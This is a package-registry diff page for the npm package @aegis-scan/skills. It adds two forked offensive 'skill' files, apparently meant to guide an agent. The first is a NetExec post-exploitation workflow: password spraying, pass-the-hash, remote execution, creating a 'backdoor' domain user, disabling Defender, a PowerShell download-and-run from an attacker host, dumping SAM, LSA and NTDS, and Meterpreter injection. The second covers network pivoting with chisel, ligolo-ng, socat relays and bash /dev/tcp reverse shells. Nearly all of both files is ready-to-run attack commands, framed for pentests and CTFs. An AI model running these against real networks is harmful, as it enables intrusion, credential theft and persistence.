npm - @aegis-scan/skills - Versions diffs - 0.4.0 → 0.5.1 - Mend

@aegis-scan/skills 0.4.0 → 0.5.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (386) hide show

package/skills/offensive/airecon-fork/postexploit-netexec-workflow/SKILL.md ADDED Viewed

@@ -0,0 +1,302 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+# NetExec (CrackMapExec) — Complete Workflow
+NetExec (nxc) is the successor to CrackMapExec — credential validation, lateral movement, and post-exploitation across SMB, WinRM, LDAP, MSSQL, SSH, RDP, FTP, NFS.
+## Install
+```bash
+pip install netexec --break-system-packages
+# OR:
+sudo apt-get install -y netexec
+# Verify:
+nxc --version
+nxc smb --help
+```
+---
+## Phase 1: Host Discovery & SMB Enumeration
+```bash
+# Discover live hosts:
+nxc smb 10.10.10.0/24
+# Detailed host info (OS, hostname, signing, SMB version):
+nxc smb 10.10.10.0/24 --gen-relay-list relay_targets.txt   # also finds no-signing hosts
+# Single host info:
+nxc smb 10.10.10.1
+# Output format:
+# SMB  10.10.10.1  445  DC01  [*] Windows Server 2019 Build 17763 (name:DC01) (domain:CORP.LOCAL) (signing:True) (SMBv1:False)
+```
+---
+## Phase 2: Credential Validation & Spraying
+```bash
+# Test single credentials:
+nxc smb 10.10.10.1 -u 'administrator' -p 'Password123!'
+nxc smb 10.10.10.1 -u 'administrator' -H 'NTHASH'   # pass-the-hash
+# Password spray (one password, many users):
+nxc smb 10.10.10.0/24 -u users.txt -p 'Password123!' --continue-on-success
+nxc smb 10.10.10.0/24 -u users.txt -p 'Password123!' --no-bruteforce   # one pass per user
+# Username spray (many users, many passwords — CAREFUL: lockout risk):
+nxc smb 10.10.10.0/24 -u users.txt -p passwords.txt --no-bruteforce
+# Domain authentication:
+nxc smb 10.10.10.0/24 -u 'user' -p 'pass' -d 'CORP.LOCAL'
+# Kerberos authentication:
+nxc smb 10.10.10.1 -u 'user' -p 'pass' -d 'CORP.LOCAL' -k
+# Null session / anonymous:
+nxc smb 10.10.10.1 -u '' -p ''
+nxc smb 10.10.10.1 -u 'guest' -p ''
+# Local account (not domain):
+nxc smb 10.10.10.1 -u 'localadmin' -p 'password' --local-auth
+# Successful auth marker: [+] → pwned: (Pwn3d!) = local admin
+# CORP.LOCAL\user:Password123! [+]   ← valid credentials
+# CORP.LOCAL\user:Password123! (Pwn3d!)  ← local admin on target
+```
+---
+## Phase 3: Enumeration (Authenticated)
+```bash
+CREDS="-u 'user' -p 'password' -d 'CORP.LOCAL'"
+# List SMB shares:
+nxc smb 10.10.10.1 $CREDS --shares
+# List logged-in users (sessions):
+nxc smb 10.10.10.1 $CREDS --sessions
+# List local groups:
+nxc smb 10.10.10.1 $CREDS --local-groups
+# List domain groups:
+nxc smb 10.10.10.1 $CREDS --groups
+# List users:
+nxc smb 10.10.10.1 $CREDS --users
+# List domain password policy:
+nxc smb 10.10.10.1 $CREDS --pass-pol
+# List logged-in users on all hosts:
+nxc smb 10.10.10.0/24 $CREDS --sessions | grep -v "Failed\|Error"
+# SMB share content enumeration:
+nxc smb 10.10.10.1 $CREDS --shares --filter-shares READ WRITE
+nxc smb 10.10.10.1 $CREDS -M spider_plus -o SHARE=share_name   # recursive file listing
+```
+---
+## Phase 4: Code Execution
+```bash
+CREDS="-u 'administrator' -p 'password' -d 'CORP.LOCAL'"
+# Execute command (default: wmiexec):
+nxc smb 10.10.10.1 $CREDS -x "whoami"
+nxc smb 10.10.10.1 $CREDS -x "whoami /all"
+# PowerShell execution:
+nxc smb 10.10.10.1 $CREDS -X "Get-Process | Select-Object -First 5"
+# Specific exec method:
+nxc smb 10.10.10.1 $CREDS -x "whoami" --exec-method wmiexec
+nxc smb 10.10.10.1 $CREDS -x "whoami" --exec-method smbexec
+nxc smb 10.10.10.1 $CREDS -x "whoami" --exec-method atexec
+nxc smb 10.10.10.1 $CREDS -x "whoami" --exec-method mmcexec
+# Execute on all Pwn3d hosts:
+nxc smb 10.10.10.0/24 $CREDS -x "net user backdoor P@ssw0rd /add /domain"
+# Disable Defender:
+nxc smb 10.10.10.1 $CREDS -X "Set-MpPreference -DisableRealtimeMonitoring \$true"
+# Reverse shell:
+nxc smb 10.10.10.1 $CREDS -X "IEX(New-Object Net.WebClient).DownloadString('http://attacker_ip/shell.ps1')"
+```
+---
+## Phase 5: Credential Dumping
+```bash
+CREDS="-u 'administrator' -p 'password' -d 'CORP.LOCAL'"
+# SAM dump (local account hashes):
+nxc smb 10.10.10.1 $CREDS --sam
+# LSASS dump (domain account hashes in memory):
+nxc smb 10.10.10.1 $CREDS --lsa
+# DCSync (domain dump — requires replication rights or DA):
+nxc smb <DC_IP> $CREDS --ntds   # full NTDS dump
+nxc smb <DC_IP> $CREDS --ntds --users administrator   # specific user
+# dpapi (browser/credential manager secrets):
+nxc smb 10.10.10.1 $CREDS -M dpapi
+# Dump all in one (SAM + LSA + NTDS):
+nxc smb <DC_IP> $CREDS --sam --lsa --ntds
+# LAPS (local admin passwords from AD):
+nxc ldap <DC_IP> $CREDS -M laps
+```
+---
+## Phase 6: WinRM
+```bash
+# WinRM (port 5985/5986) — PowerShell remoting
+# Interactive shell:
+nxc winrm 10.10.10.1 -u 'user' -p 'password' -d 'CORP.LOCAL'
+# Command execution:
+nxc winrm 10.10.10.1 -u 'user' -p 'password' -x "whoami"
+# Spray for WinRM access:
+nxc winrm 10.10.10.0/24 -u 'administrator' -p 'Password123!'
+```
+---
+## Phase 7: LDAP
+```bash
+# LDAP enumeration (port 389/636):
+nxc ldap <DC_IP> -u 'user' -p 'password' -d 'CORP.LOCAL'
+# Kerberoastable accounts:
+nxc ldap <DC_IP> -u 'user' -p 'password' -M kerberoasting
+# AS-REP roastable:
+nxc ldap <DC_IP> -u 'user' -p 'password' -M asreproast
+# Password not required:
+nxc ldap <DC_IP> -u 'user' -p 'password' -M pso
+# LDAP password spray:
+nxc ldap <DC_IP> -u users.txt -p 'Password123!' -d 'CORP.LOCAL'
+# LAPS read:
+nxc ldap <DC_IP> -u 'user' -p 'password' -M laps
+# GMSA (Group Managed Service Account) passwords:
+nxc ldap <DC_IP> -u 'user' -p 'password' -M gmsa
+# Dump domain users:
+nxc ldap <DC_IP> -u 'user' -p 'password' --users
+nxc ldap <DC_IP> -u 'user' -p 'password' --groups
+nxc ldap <DC_IP> -u 'user' -p 'password' --trusted-for-delegation
+nxc ldap <DC_IP> -u 'user' -p 'password' --password-not-required
+```
+---
+## Phase 8: MSSQL
+```bash
+# MSSQL (port 1433):
+nxc mssql 10.10.10.1 -u 'sa' -p 'password' -d 'CORP.LOCAL'
+# Execute OS command via xp_cmdshell:
+nxc mssql 10.10.10.1 -u 'sa' -p 'password' -x "whoami"
+# Enable xp_cmdshell if disabled:
+nxc mssql 10.10.10.1 -u 'sa' -p 'password' -q "EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;"
+# PowerShell through MSSQL:
+nxc mssql 10.10.10.1 -u 'sa' -p 'password' -X "Get-ChildItem C:\\"
+# Linked server enumeration:
+nxc mssql 10.10.10.1 -u 'sa' -p 'password' -q "SELECT name FROM sys.servers"
+```
+---
+## Phase 9: Modules & Post-Exploitation
+```bash
+CREDS="-u 'admin' -p 'password' -d 'CORP.LOCAL'"
+# List available modules:
+nxc smb -L
+nxc ldap -L
+# Key modules:
+nxc smb 10.10.10.1 $CREDS -M mimikatz      # in-memory mimikatz (OPSEC risk!)
+nxc smb 10.10.10.1 $CREDS -M met_inject    # inject Meterpreter
+nxc smb 10.10.10.1 $CREDS -M slinky        # LNK file drop (credential theft)
+nxc smb 10.10.10.1 $CREDS -M gpp_password  # Group Policy Preferences passwords
+nxc smb 10.10.10.1 $CREDS -M gpp_autologin # autologin credentials from GPP
+nxc smb 10.10.10.1 $CREDS -M ms17-010      # EternalBlue check (no exploit)
+nxc smb 10.10.10.0/24 $CREDS -M zerologon  # Zerologon check
+# GPP passwords (domain controller SYSVOL):
+nxc smb <DC_IP> $CREDS -M gpp_password
+nxc smb <DC_IP> $CREDS -M gpp_autologin
+# File search (find sensitive files):
+nxc smb 10.10.10.1 $CREDS -M spider_plus -o READ_ONLY=false
+nxc smb 10.10.10.1 $CREDS -M spider_plus -o PATTERN='password,cred,secret,config'
+# Download file:
+nxc smb 10.10.10.1 $CREDS --get-file 'C:\Users\admin\Documents\passwords.txt' ./local_passwords.txt
+# Upload file:
+nxc smb 10.10.10.1 $CREDS --put-file ./backdoor.exe 'C:\Windows\Temp\backdoor.exe'
+```
+---
+## Phase 10: Output & Automation
+```bash
+# Save results to file:
+nxc smb 10.10.10.0/24 -u admin -p pass --export json output.json
+# Filter output to successful only:
+nxc smb 10.10.10.0/24 -u admin -p pass 2>/dev/null | grep "\[+\]"
+# Pwn3d hosts (local admin):
+nxc smb 10.10.10.0/24 -u admin -p pass 2>/dev/null | grep "Pwn3d!"
+# Chain: spray → find DA sessions → dump:
+nxc smb 10.10.10.0/24 -u users.txt -p 'Pass1234!' --continue-on-success > spray_results.txt
+PWNED=$(grep "Pwn3d!" spray_results.txt | awk '{print $3}')
+for ip in $PWNED; do
+    echo "=== Dumping $ip ==="
+    nxc smb $ip -u admin -p 'Pass1234!' --sam --lsa 2>/dev/null
+done
+```
+---
+## Pro Tips
+1. **Always check SMB signing** — `--gen-relay-list` marks no-signing hosts → relay targets
+2. **`--continue-on-success`** — essential for spray; stops at first valid cred per host otherwise
+3. **`--local-auth`** — local account (not domain) useful for workstations with same local admin password
+4. **Pwn3d! = local admin** — can dump SAM/LSASS → likely reused password or PTH to other hosts
+5. **`-M gpp_password`** — finds plaintext creds in old GPO files, still common in 2024
+6. **LDAP password spray** — lower lockout risk than SMB; some DCs don't lock on LDAP
+7. **`nxc smb <DC> --ntds`** — equivalent to secretsdump; requires DA or DCSync privileges
+## Summary
+netexec flow: `nxc smb <subnet>` discover → spray with `users.txt` + `Pass1234!` → find `Pwn3d!` hosts → `--sam --lsa` on each → crack hashes → spray new creds → reach DC → `--ntds` for full dump → golden ticket for persistence.

package/skills/offensive/airecon-fork/postexploit-pivoting/SKILL.md ADDED Viewed

@@ -0,0 +1,205 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: pivoting
+description: Network pivoting and tunneling — chisel SOCKS proxy, ligolo-ng, socat port forwarding, SSH tunneling, proxychains, and reaching internal networks through a compromised host
+---
+# Pivoting & Tunneling
+Pivoting = using a compromised host as a relay to reach internal network segments not directly accessible. Goal: route tools through a pivot point to scan/attack internal resources.
+**Install:**
+```
+# chisel:
+wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz -O /tmp/chisel.gz && gunzip /tmp/chisel.gz && mv /tmp/chisel /home/pentester/tools/chisel && chmod +x /home/pentester/tools/chisel
+# ligolo-ng:
+wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/proxy_linux_amd64 -O /home/pentester/tools/ligolo-proxy && chmod +x /home/pentester/tools/ligolo-proxy
+wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/agent_linux_amd64 -O /home/pentester/tools/ligolo-agent && chmod +x /home/pentester/tools/ligolo-agent
+sudo apt-get install -y proxychains4 socat ncat
+```
+---
+## proxychains Setup
+Used to route any tool through a SOCKS proxy:
+    # Edit /etc/proxychains4.conf:
+    # Comment out proxy_dns if causing issues
+    # At bottom:
+    socks5 127.0.0.1 1080   # for SOCKS5 proxy on local port 1080
+    # OR socks4 for chisel/SSH:
+    socks4 127.0.0.1 1080
+    # Use with any tool:
+    proxychains nmap -sT -p 80,443,22,445 10.10.10.0/24
+    proxychains crackmapexec smb 10.10.10.0/24 -u admin -p pass
+    proxychains evil-winrm -i 10.10.10.5 -u admin -p pass
+    proxychains curl http://internal-app.corp/
+    proxychains ssh user@internal-host
+---
+## chisel — SOCKS Proxy (Recommended for CTF/Pentest)
+Chisel creates a TCP tunnel. Run server on attacker, agent on pivot host.
+### Setup (attacker = Kali, pivot = compromised host)
+    # Step 1: Start chisel server on Kali:
+    /home/pentester/tools/chisel server --reverse -p 8001
+    # Listens on port 8001 for agents
+    # Step 2: Transfer chisel to pivot host and run as client:
+    # Linux pivot:
+    ./chisel client <attacker_ip>:8001 R:1080:socks
+    # Windows pivot (download chisel.exe):
+    chisel.exe client <attacker_ip>:8001 R:1080:socks
+    # Step 3: Configure proxychains:
+    # /etc/proxychains4.conf: socks5 127.0.0.1 1080
+    # Step 4: Use proxychains to reach internal network:
+    proxychains nmap -sT -p 22,80,443,445 10.10.10.0/24
+### Local Port Forward (specific port only)
+    # Expose internal service locally:
+    # Access 10.10.10.5:3306 (MySQL) via localhost:3306:
+    ./chisel client <attacker_ip>:8001 R:3306:10.10.10.5:3306
+    # Access internal web app on 192.168.1.10:8080 via localhost:8080:
+    ./chisel client <attacker_ip>:8001 R:8080:192.168.1.10:8080
+---
+## ligolo-ng — Layer-3 VPN Tunnel (Best for Full Network Access)
+Ligolo creates a real network interface — no proxychains needed, nmap -sS works!
+### Setup
+    # Step 1: Create tunnel interface on Kali:
+    sudo ip tuntap add user $(whoami) mode tun ligolo
+    sudo ip link set ligolo up
+    # Step 2: Start proxy on Kali:
+    sudo /home/pentester/tools/ligolo-proxy -selfcert -laddr 0.0.0.0:11601
+    # Step 3: Run agent on pivot host:
+    # Linux:
+    ./ligolo-agent -connect <attacker_ip>:11601 -ignore-cert
+    # Windows:
+    ligolo-agent.exe -connect <attacker_ip>:11601 -ignore-cert
+    # Step 4: In ligolo proxy console → session established:
+    ligolo-ng>> session               # Select connected agent
+    ligolo-ng>> ifconfig              # See internal network interfaces
+    ligolo-ng>> start                 # Start tunnel
+    # Step 5: Add route on Kali for internal network:
+    sudo ip route add 10.10.10.0/24 dev ligolo
+    # Step 6: Now reach internal network DIRECTLY (no proxychains!):
+    nmap -sS -p 22,80,443,445 10.10.10.0/24    # Full nmap works
+    curl http://10.10.10.5/
+    ssh user@10.10.10.5
+---
+## SSH Tunneling
+### Dynamic (SOCKS Proxy)
+    # SSH SOCKS5 proxy on local port 1080:
+    ssh -D 1080 user@<pivot_host>
+    # Then: proxychains <any_tool>
+### Local Port Forward
+    # Access internal-host:3306 via localhost:3306:
+    ssh -L 3306:10.10.10.5:3306 user@<pivot_host>
+    # Access multiple internal services:
+    ssh -L 8080:internal-web:80 -L 3306:internal-db:3306 user@<pivot_host>
+### Remote Port Forward (reverse tunnel)
+    # Expose attacker service through pivot (useful for reverse shells):
+    ssh -R 4444:localhost:4444 user@<pivot_host>
+    # On target inside network: nc <pivot_ip> 4444 → connects to attacker's port 4444
+### ProxyJump (multi-hop)
+    # SSH through two pivot hosts:
+    ssh -J user@pivot1 user@internal-host
+    ssh -J user@pivot1,user@pivot2 user@deep-internal
+---
+## socat — Port Forwarding (when SSH not available)
+    # Forward all traffic on port 8080 to internal host:
+    socat TCP-LISTEN:8080,fork TCP:10.10.10.5:80
+    # Relay reverse shell through pivot:
+    # On pivot:
+    socat TCP-LISTEN:4444,fork TCP:<attacker>:4444
+    # On target:
+    bash -i >& /dev/tcp/<pivot_ip>/4444 0>&1
+---
+## Reverse Shell Through Pivot
+    # If target can only reach pivot (not attacker directly):
+    # Step 1: Setup socat relay on pivot:
+    socat TCP-LISTEN:4444,fork TCP:<attacker>:5555 &
+    # Step 2: Setup listener on attacker:
+    nc -lvnp 5555
+    # Step 3: Execute reverse shell on deep target pointing to pivot:
+    bash -i >& /dev/tcp/<pivot_ip>/4444 0>&1
+---
+## Double Pivot (Chaining)
+    # Reach network behind second pivot:
+    # Network: Kali → Pivot1 → Pivot2 → Internal
+    # On Kali: start chisel server
+    /home/pentester/tools/chisel server --reverse -p 8001
+    # On Pivot1: connect to Kali + create second server for Pivot2
+    ./chisel client <kali>:8001 R:8002:127.0.0.1:8002 &
+    ./chisel server --reverse -p 8002 &
+    # On Pivot2: connect back through Pivot1:
+    ./chisel client <pivot1_ip>:8002 R:1080:socks
+    # Kali proxychains → SOCKS on 127.0.0.1:1080 → Pivot2's network
+---
+## Pro Tips
+1. **chisel** = easiest setup, works on any OS, single binary, no root needed
+2. **ligolo-ng** = best for extended engagements — full layer-3, nmap SYN works, no proxychains
+3. `proxychains nmap -sT` (TCP connect, not SYN) — SYN doesn't work through SOCKS
+4. Always bring chisel binaries for both Linux AND Windows — cross-platform agent
+5. SSH SOCKS (`-D`) = simplest if SSH access exists — no additional tools
+6. socat relay = best emergency option, available on most Linux systems by default
+## Summary
+Pivoting toolkit priority:
+1. SSH `-D 1080` → proxychains (if SSH access, easiest)
+2. Chisel server (Kali) + client (pivot) → SOCKS5 → proxychains (most common CTF/pentest)
+3. ligolo-ng → full layer-3 interface → no proxychains needed (best for extended pentest)
+4. socat → emergency port forward when no other tool available
+Configure `/etc/proxychains4.conf` once → `proxychains <any_tool>` reaches internal network.